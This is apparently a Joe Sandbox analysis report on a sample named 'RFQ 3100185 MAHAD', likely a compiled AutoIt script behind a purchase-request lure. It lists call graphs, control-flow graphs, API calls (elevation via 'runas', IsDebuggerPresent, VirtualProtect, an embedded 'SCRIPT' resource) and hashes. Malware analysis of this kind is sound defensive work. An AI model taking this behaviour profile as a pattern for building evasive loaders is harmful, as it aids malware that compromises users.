96167->96087 96168->96101 96170 7b936c 81 API calls 96169->96170 96171 80f8ea 96170->96171 96193 80f92c Mailbox 96171->96193 96205 810567 96171->96205 96173 80fb8b 96174 80fcfa 96173->96174 96179 80fb95 96173->96179 96253 810688 89 API calls Mailbox 96174->96253 96177 80fd07 96178 80fd13 96177->96178 96177->96179 96178->96193 96218 80f70a 96179->96218 96180 7b936c 81 API calls 96195 80f984 Mailbox 96180->96195 96185 80fbc9 96232 7ced18 96185->96232 96188 80fbe3 96251 7fcc5c 86 API calls 4 library calls 96188->96251 96189 80fbfd 96190 7cc050 48 API calls 96189->96190 96194 80fc14 96190->96194 96192 80fbee GetCurrentProcess TerminateProcess 96192->96189 96193->96117 96196 7c1b90 48 API calls 96194->96196 96204 80fc3e 96194->96204 96195->96173 96195->96180 96195->96193 96249 8129e8 48 API calls ___crtGetEnvironmentStringsW 96195->96249 96250 80fda5 60 API calls 2 library calls 96195->96250 96198 80fc2d 96196->96198 96197 80fd65 96197->96193 96201 80fd7e FreeLibrary 96197->96201 96199 81040f 105 API calls 96198->96199 96199->96204 96200 7c1b90 48 API calls 96200->96204 96201->96193 96204->96197 96204->96200 96236 81040f 96204->96236 96252 7bdcae 50 API calls Mailbox 96204->96252 96206 7bbdfa 48 API calls 96205->96206 96207 810582 CharLowerBuffW 96206->96207 96254 7f1f11 96207->96254 96211 7bd7f7 48 API calls 96212 8105bb 96211->96212 96261 7b69e9 48 API calls ___crtGetEnvironmentStringsW 96212->96261 96214 8105d2 96215 7bb18b 48 API calls 96214->96215 96216 8105de Mailbox 96215->96216 96217 81061a Mailbox 96216->96217 96262 80fda5 60 API calls 2 library calls 96216->96262 96217->96195 96219 80f725 96218->96219 96223 80f77a 96218->96223 96220 7cf4ea 48 API calls 96219->96220 96221 80f747 96220->96221 96222 7cf4ea 48 API calls 96221->96222 96221->96223 96222->96221 96224 810828 96223->96224 96225 810a53 Mailbox 96224->96225 96231 81084b _strcat _wcscpy __wsetenvp 96224->96231 96225->96185 96226 7bcf93 58 API calls 96226->96231 96227 7bd286 48 API calls 96227->96231 96228 7d395c 47 API calls _W_store_winword 96228->96231 96229 7b936c 81 API calls 96229->96231 96231->96225 96231->96226 96231->96227 96231->96228 96231->96229 96265 7f8035 50 API calls __wsetenvp 96231->96265 96233 7ced2d 96232->96233 96234 7cedc5 VirtualProtect 96233->96234 96235 7ced93 96233->96235 96234->96235 96235->96188 96235->96189 96237 810427 96236->96237 96242 810443 96236->96242 96238 8104f8 96237->96238 96239 81044f 96237->96239 96240 81042e 96237->96240 96237->96242 96269 7f9dc5 103 API calls 96238->96269 96268 7bcdb9 48 API calls 96239->96268 96266 7f7c56 50 API calls _strlen 96240->96266 96241 81051e 96241->96204 96242->96241 96245 7d1c9d _free 47 API calls 96242->96245 96245->96241 96247 810438 96267 7bcdb9 48 API calls 96247->96267 96249->96195 96250->96195 96251->96192 96252->96204 96253->96177 96255 7f1f3b __wsetenvp 96254->96255 96256 7f1f79 96255->96256 96258 7f1f6f 96255->96258 96260 7f1ffa 96255->96260 96256->96211 96256->96216 96258->96256 96263 7cd37a 60 API calls 96258->96263 96260->96256 96264 7cd37a 60 API calls 96260->96264 96261->96214 96262->96217 96263->96258 96264->96260 96265->96231 96266->96247 96267->96242 96268->96242 96269->96242 96270->96152 96271->96132 96272 8219dd 96277 7b4a30 96272->96277 96274 8219f1 96297 7d0f0a 52 API calls __cinit 96274->96297 96276 8219fb 96278 7b4a40 __ftell_nolock 96277->96278 96279 7bd7f7 48 API calls 96278->96279 96280 7b4af6 96279->96280 96281 7b5374 50 API calls 96280->96281 96282 7b4aff 96281->96282 96298 7b363c 96282->96298 96285 7b518c 48 API calls 96286 7b4b18 96285->96286 96287 7b64cf 48 API calls 96286->96287 96288 7b4b29 96287->96288 96289 7bd7f7 48 API calls 96288->96289 96290 7b4b32 96289->96290 96304 7b49fb 96290->96304 96292 7b4b43 Mailbox 96292->96274 96293 7b4b3d _wcscat Mailbox __wsetenvp 96293->96292 96294 7bce19 48 API calls 96293->96294 96295 7b64cf 48 API calls 96293->96295 96296 7b61a6 48 API calls 96293->96296 96294->96293 96295->96293 96296->96293 96297->96276 96299 7b3649 __ftell_nolock 96298->96299 96318 7b366c GetFullPathNameW 96299->96318 96301 7b365a 96302 7b6a63 48 API calls 96301->96302 96303 7b3669 96302->96303 96303->96285 96320 7bbcce 96304->96320 96307 7b4a2b 96307->96293 96308 8241cc RegQueryValueExW 96309 824246 RegCloseKey 96308->96309 96310 8241e5 96308->96310 96311 7cf4ea 48 API calls 96310->96311 96312 8241fe 96311->96312 96313 7b47b7 48 API calls 96312->96313 96314 824208 RegQueryValueExW 96313->96314 96315 824224 96314->96315 96316 82423b 96314->96316 96317 7b6a63 48 API calls 96315->96317 96316->96309 96317->96316 96319 7b368a 96318->96319 96319->96301 96321 7b4a0a RegOpenKeyExW 96320->96321 96322 7bbce8 96320->96322 96321->96307 96321->96308 96323 7cf4ea 48 API calls 96322->96323 96324 7bbcf2 96323->96324 96325 7cee75 48 API calls 96324->96325 96325->96321

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 643 7db043-7db080 call 7df8a0 646 7db089-7db08b 643->646 647 7db082-7db084 643->647 649 7db08d-7db0a7 call 7d7bda call 7d7c0e call 7d6e10 646->649 650 7db0ac-7db0d9 646->650 648 7db860-7db86c call 7da70c 647->648 649->648 651 7db0db-7db0de 650->651 652 7db0e0-7db0e7 650->652 651->652 655 7db10b-7db110 651->655 656 7db0e9-7db100 call 7d7bda call 7d7c0e call 7d6e10 652->656 657 7db105 652->657 661 7db11f-7db12d call 7e3bf2 655->661 662 7db112-7db11c call 7df82f 655->662 692 7db851-7db854 656->692 657->655 673 7db44b-7db45d 661->673 674 7db133-7db145 661->674 662->661 677 7db7b8-7db7d5 WriteFile 673->677 678 7db463-7db473 673->678 674->673 676 7db14b-7db183 call 7d7a0d GetConsoleMode 674->676 676->673 696 7db189-7db18f 676->696 684 7db7d7-7db7df 677->684 685 7db7e1-7db7e7 GetLastError 677->685 681 7db479-7db484 678->681 682 7db55a-7db55f 678->682 690 7db81b-7db833 681->690 691 7db48a-7db49a 681->691 687 7db565-7db56e 682->687 688 7db663-7db66e 682->688 686 7db7e9 684->686 685->686 693 7db7ef-7db7f1 686->693 687->690 694 7db574 687->694 688->690 700 7db674 688->700 698 7db83e-7db84e call 7d7c0e call 7d7bda 690->698 699 7db835-7db838 690->699 697 7db4a0-7db4a3 691->697 695 7db85e-7db85f 692->695 702 7db856-7db85c 693->702 703 7db7f3-7db7f5 693->703 704 7db57e-7db595 694->704 695->648 705 7db199-7db1bc GetConsoleCP 696->705 706 7db191-7db193 696->706 707 7db4e9-7db520 WriteFile 697->707 708 7db4a5-7db4be 697->708 698->692 699->698 709 7db83a-7db83c 699->709 710 7db67e-7db693 700->710 702->695 703->690 713 7db7f7-7db7fc 703->713 714 7db59b-7db59e 704->714 715 7db440-7db446 705->715 716 7db1c2-7db1ca 705->716 706->673 706->705 707->685 719 7db526-7db538 707->719 717 7db4cb-7db4e7 708->717 718 7db4c0-7db4ca 708->718 709->695 711 7db699-7db69b 710->711 720 7db69d-7db6b3 711->720 721 7db6d8-7db719 WideCharToMultiByte 711->721 723 7db7fe-7db810 call 7d7c0e call 7d7bda 713->723 724 7db812-7db819 call 7d7bed 713->724 725 7db5de-7db627 WriteFile 714->725 726 7db5a0-7db5b6 714->726 715->703 727 7db1d4-7db1d6 716->727 717->697 717->707 718->717 719->693 728 7db53e-7db54f 719->728 730 7db6b5-7db6c4 720->730 731 7db6c7-7db6d6 720->731 721->685 733 7db71f-7db721 721->733 723->692 724->692 725->685 738 7db62d-7db645 725->738 735 7db5cd-7db5dc 726->735 736 7db5b8-7db5ca 726->736 739 7db1dc-7db1fe 727->739 740 7db36b-7db36e 727->740 728->691 729 7db555 728->729 729->693 730->731 731->711 731->721 743 7db727-7db75a WriteFile 733->743 735->714 735->725 736->735 738->693 746 7db64b-7db658 738->746 747 7db217-7db223 call 7d1688 739->747 748 7db200-7db215 739->748 741 7db375-7db3a2 740->741 742 7db370-7db373 740->742 749 7db3a8-7db3ab 741->749 742->741 742->749 750 7db75c-7db776 743->750 751 7db77a-7db78e GetLastError 743->751 746->704 753 7db65e 746->753 763 7db269-7db26b 747->763 764 7db225-7db239 747->764 754 7db271-7db283 call 7e40f7 748->754 757 7db3ad-7db3b0 749->757 758 7db3b2-7db3c5 call 7e5884 749->758 750->743 759 7db778 750->759 762 7db794-7db796 751->762 753->693 773 7db289 754->773 774 7db435-7db43b 754->774 757->758 765 7db407-7db40a 757->765 758->685 777 7db3cb-7db3d5 758->777 759->762 762->686 768 7db798-7db7b0 762->768 763->754 770 7db23f-7db254 call 7e40f7 764->770 771 7db412-7db42d 764->771 765->727 769 7db410 765->769 768->710 775 7db7b6 768->775 769->774 770->774 783 7db25a-7db267 770->783 771->774 778 7db28f-7db2c4 WideCharToMultiByte 773->778 774->686 775->693 780 7db3fb-7db401 777->780 781 7db3d7-7db3ee call 7e5884 777->781 778->774 782 7db2ca-7db2f0 WriteFile 778->782 780->765 781->685 788 7db3f4-7db3f5 781->788 782->685 785 7db2f6-7db30e 782->785 783->778 785->774 787 7db314-7db31b 785->787 787->780 789 7db321-7db34c WriteFile 787->789 788->780 789->685 790 7db352-7db359 789->790 790->774 791 7db35f-7db366 790->791 791->780
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 38efee3ae7810dbb8eace232f8ed2d61c987908e249679c51965c43f5d0eba68
                                                            • Instruction ID: e1a0642301057b1e55cbcc00464c4903eec3743c0e1c269a911fa8f213795359
                                                            • Opcode Fuzzy Hash: 38efee3ae7810dbb8eace232f8ed2d61c987908e249679c51965c43f5d0eba68
                                                            • Instruction Fuzzy Hash: 40325A75A02269CBCB24CF54DC856E9B7B5FB4A310F5940DAE40AE7B81D7389E80CF52

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,007B3AA3,?), ref: 007B3D45
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,007B3AA3,?), ref: 007B3D57
                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,00871148,00871130,?,?,?,?,007B3AA3,?), ref: 007B3DC8
                                                              • Part of subcall function 007B6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,007B3DEE,00871148,?,?,?,?,?,007B3AA3,?), ref: 007B6471
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,007B3AA3,?), ref: 007B3E48
                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,008628F4,00000010), ref: 00821CCE
                                                            • SetCurrentDirectoryW.KERNEL32(?,00871148,?,?,?,?,?,007B3AA3,?), ref: 00821D06
                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0084DAB4,00871148,?,?,?,?,?,007B3AA3,?), ref: 00821D89
                                                            • ShellExecuteW.SHELL32(00000000,?,?,?,?,007B3AA3), ref: 00821D90
                                                              • Part of subcall function 007B3E6E: GetSysColorBrush.USER32(0000000F), ref: 007B3E79
                                                              • Part of subcall function 007B3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 007B3E88
                                                              • Part of subcall function 007B3E6E: LoadIconW.USER32(00000063), ref: 007B3E9E
                                                              • Part of subcall function 007B3E6E: LoadIconW.USER32(000000A4), ref: 007B3EB0
                                                              • Part of subcall function 007B3E6E: LoadIconW.USER32(000000A2), ref: 007B3EC2
                                                              • Part of subcall function 007B3E6E: RegisterClassExW.USER32(?), ref: 007B3F30
                                                              • Part of subcall function 007B36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007B36E6
                                                              • Part of subcall function 007B36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007B3707
                                                              • Part of subcall function 007B36B8: ShowWindow.USER32(00000000,?,?,?,?,007B3AA3,?), ref: 007B371B
                                                              • Part of subcall function 007B36B8: ShowWindow.USER32(00000000,?,?,?,?,007B3AA3,?), ref: 007B3724
                                                              • Part of subcall function 007B4FFC: _memset.LIBCMT ref: 007B5022
                                                              • Part of subcall function 007B4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007B50CB
                                                            Strings
                                                            • This is a third-party compiled AutoIt script., xrefs: 00821CC8
                                                            • runas, xrefs: 00821D84
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                            • String ID: This is a third-party compiled AutoIt script.$runas
                                                            • API String ID: 438480954-3287110873
                                                            • Opcode ID: ca6984b8538bdc02f9c9247cdc6a6cb3a00f3f2b7bd5c10461b06185c892da97
                                                            • Instruction ID: 6c9366069256f638b56c6c48375467b773617620f852f76baf183bc6494ac2f6
                                                            • Opcode Fuzzy Hash: ca6984b8538bdc02f9c9247cdc6a6cb3a00f3f2b7bd5c10461b06185c892da97
                                                            • Instruction Fuzzy Hash: A151F530A04248EACF11ABB8EC4EFED7B75FB55740F008065F615A6296DA7CDA85CB31

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1137 7cddc0-7cde4f call 7bd7f7 GetVersionExW call 7b6a63 call 7cdfb4 call 7b6571 1146 7cde55-7cde56 1137->1146 1147 8224c8-8224cb 1137->1147 1150 7cde58-7cde63 1146->1150 1151 7cde92-7cdea2 call 7cdf77 1146->1151 1148 8224e4-8224e8 1147->1148 1149 8224cd 1147->1149 1153 8224d3-8224dc 1148->1153 1154 8224ea-8224f3 1148->1154 1152 8224d0 1149->1152 1155 7cde69-7cde6b 1150->1155 1156 82244e-822454 1150->1156 1164 7cdea4-7cdec1 GetCurrentProcess call 7cdf5f 1151->1164 1165 7cdec7-7cdee1 1151->1165 1152->1153 1153->1148 1154->1152 1161 8224f5-8224f8 1154->1161 1162 822469-822475 1155->1162 1163 7cde71-7cde74 1155->1163 1159 822456-822459 1156->1159 1160 82245e-822464 1156->1160 1159->1151 1160->1151 1161->1153 1166 822477-82247a 1162->1166 1167 82247f-822485 1162->1167 1168 7cde7a-7cde89 1163->1168 1169 822495-822498 1163->1169 1164->1165 1188 7cdec3 1164->1188 1171 7cdf31-7cdf3b GetSystemInfo 1165->1171 1172 7cdee3-7cdef7 call 7ce00c 1165->1172 1166->1151 1167->1151 1173 7cde8f 1168->1173 1174 82248a-822490 1168->1174 1169->1151 1175 82249e-8224b3 1169->1175 1177 7cdf0e-7cdf1a 1171->1177 1185 7cdf29-7cdf2f GetSystemInfo 1172->1185 1186 7cdef9-7cdf01 call 7cdff4 GetNativeSystemInfo 1172->1186 1173->1151 1174->1151 1179 8224b5-8224b8 1175->1179 1180 8224bd-8224c3 1175->1180 1181 7cdf1c-7cdf1f FreeLibrary 1177->1181 1182 7cdf21-7cdf26 1177->1182 1179->1151 1180->1151 1181->1182 1187 7cdf03-7cdf07 1185->1187 1186->1187 1187->1177 1191 7cdf09-7cdf0c FreeLibrary 1187->1191 1188->1165 1191->1177
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 007CDDEC
                                                            • GetCurrentProcess.KERNEL32(00000000,0084DC38,?,?), ref: 007CDEAC
                                                            • GetNativeSystemInfo.KERNELBASE(?,0084DC38,?,?), ref: 007CDF01
                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 007CDF0C
                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 007CDF1F
                                                            • GetSystemInfo.KERNEL32(?,0084DC38,?,?), ref: 007CDF29
                                                            • GetSystemInfo.KERNEL32(?,0084DC38,?,?), ref: 007CDF35
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                            • String ID:
                                                            • API String ID: 3851250370-0
                                                            • Opcode ID: b71a3f6c5c06655b0a72d2a9c5c6b7ae8f08131195f4c31db96c5df860bf6c6a
                                                            • Instruction ID: 35a5663f624190e910d547bb1768956a892e0dc54da64677a07a81c7333622e2
                                                            • Opcode Fuzzy Hash: b71a3f6c5c06655b0a72d2a9c5c6b7ae8f08131195f4c31db96c5df860bf6c6a
                                                            • Instruction Fuzzy Hash: 8A61B47180A394DBCF25DF6894C06ED7FB4BF29300B1989EDD8459F207D628C948CB65

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1209 7b406b-7b4083 CreateStreamOnHGlobal 1210 7b40a3-7b40a6 1209->1210 1211 7b4085-7b409c FindResourceExW 1209->1211 1212 824f16-824f25 LoadResource 1211->1212 1213 7b40a2 1211->1213 1212->1213 1214 824f2b-824f39 SizeofResource 1212->1214 1213->1210 1214->1213 1215 824f3f-824f4a LockResource 1214->1215 1215->1213 1216 824f50-824f6e 1215->1216 1216->1213
                                                            APIs
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,007B449E,?,?,00000000,00000001), ref: 007B407B
                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007B449E,?,?,00000000,00000001), ref: 007B4092
                                                            • LoadResource.KERNEL32(?,00000000,?,?,007B449E,?,?,00000000,00000001,?,?,?,?,?,?,007B41FB), ref: 00824F1A
                                                            • SizeofResource.KERNEL32(?,00000000,?,?,007B449E,?,?,00000000,00000001,?,?,?,?,?,?,007B41FB), ref: 00824F2F
                                                            • LockResource.KERNEL32(007B449E,?,?,007B449E,?,?,00000000,00000001,?,?,?,?,?,?,007B41FB,00000000), ref: 00824F42
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                            • String ID: SCRIPT
                                                            • API String ID: 3051347437-3967369404
                                                            • Opcode ID: da21779078d7d45d6815d1443849b9e42e9075f43c348c7c50b54f33580e51e0
                                                            • Instruction ID: 6025d747bb8d8d96031e04f11fb247298875d28fb33d9abd7aece3a360e0e379
                                                            • Opcode Fuzzy Hash: da21779078d7d45d6815d1443849b9e42e9075f43c348c7c50b54f33580e51e0
                                                            • Instruction Fuzzy Hash: B3112A71200701AFE7219B65EC49F677BB9FBC5B51F10456CF612962A0DB71EC008A31
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,00822F49), ref: 007F6CB9
                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 007F6CCA
                                                            • FindClose.KERNEL32(00000000), ref: 007F6CDA
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirst
                                                            • String ID:
                                                            • API String ID: 48322524-0
                                                            • Opcode ID: bf199d7d4e9179a52c52caee7d7915f9e4cdc67edb7c591bdbf0819d1f2a5591
                                                            • Instruction ID: e610d76839e3f1bfc216934eb2d107eda5e88145754883482bb18b7cc4b415db
                                                            • Opcode Fuzzy Hash: bf199d7d4e9179a52c52caee7d7915f9e4cdc67edb7c591bdbf0819d1f2a5591
                                                            • Instruction Fuzzy Hash: 7DE0D8358145155782106738FC0D4FD776CEA45339F100B06F6B1C22D0E774E90096E6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Exception@8Throwstd::exception::exception
                                                            • String ID: @
                                                            • API String ID: 3728558374-2766056989
                                                            • Opcode ID: ae6d24f27b93a8b56a4fc0859a6b0e69b5a72d3b46fcdfec921a6b0022cd5646
                                                            • Instruction ID: 0aa561ae43839961a5999f422eb9520b13f3844305c7abc03685768a3ec962a1
                                                            • Opcode Fuzzy Hash: ae6d24f27b93a8b56a4fc0859a6b0e69b5a72d3b46fcdfec921a6b0022cd5646
                                                            • Instruction Fuzzy Hash: 83727C71A04219DBCB24DF94C495FAEB7B5FF48300F14C05EE90AAB251D739AE85CB91
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID:
                                                            • API String ID: 3964851224-0
                                                            • Opcode ID: d0a530cc9fec76ee6412902ea3627f05d4bd888a4852f36419b553074f11417d
                                                            • Instruction ID: 4e8b679923c8381c50437ea57e73e369b8910adc44f952895a3a801e7ac76500
                                                            • Opcode Fuzzy Hash: d0a530cc9fec76ee6412902ea3627f05d4bd888a4852f36419b553074f11417d
                                                            • Instruction Fuzzy Hash: 37922670608241DFD724DF18C484F6ABBE1FF88304F14895DE99A8B262D779ED85CB92
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007BE959
                                                            • timeGetTime.WINMM ref: 007BEBFA
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007BED2E
                                                            • TranslateMessage.USER32(?), ref: 007BED3F
                                                            • DispatchMessageW.USER32(?), ref: 007BED4A
                                                            • LockWindowUpdate.USER32(00000000), ref: 007BED79
                                                            • DestroyWindow.USER32 ref: 007BED85
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007BED9F
                                                            • Sleep.KERNEL32(0000000A), ref: 00825270
                                                            • TranslateMessage.USER32(?), ref: 008259F7
                                                            • DispatchMessageW.USER32(?), ref: 00825A05
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00825A19
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                            • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                            • API String ID: 2641332412-570651680
                                                            • Opcode ID: fce99399cc42bea3e5da4a762ad3861be37bb7b855bfeddc9bd1803788ed7e48
                                                            • Instruction ID: 2422aa079d91d5d06242f1e0f376cdca6daf571086ff6d407f86dd639926cb9d
                                                            • Opcode Fuzzy Hash: fce99399cc42bea3e5da4a762ad3861be37bb7b855bfeddc9bd1803788ed7e48
                                                            • Instruction Fuzzy Hash: 71627070544350DFDB24DF24D889BEA77E4FB44304F14496DF98A8B292DB79E888CB62
                                                            APIs
                                                            • ___createFile.LIBCMT ref: 007E5EC3
                                                            • ___createFile.LIBCMT ref: 007E5F04
                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 007E5F2D
                                                            • __dosmaperr.LIBCMT ref: 007E5F34
                                                            • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 007E5F47
                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 007E5F6A
                                                            • __dosmaperr.LIBCMT ref: 007E5F73
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 007E5F7C
                                                            • __set_osfhnd.LIBCMT ref: 007E5FAC
                                                            • __lseeki64_nolock.LIBCMT ref: 007E6016
                                                            • __close_nolock.LIBCMT ref: 007E603C
                                                            • __chsize_nolock.LIBCMT ref: 007E606C
                                                            • __lseeki64_nolock.LIBCMT ref: 007E607E
                                                            • __lseeki64_nolock.LIBCMT ref: 007E6176
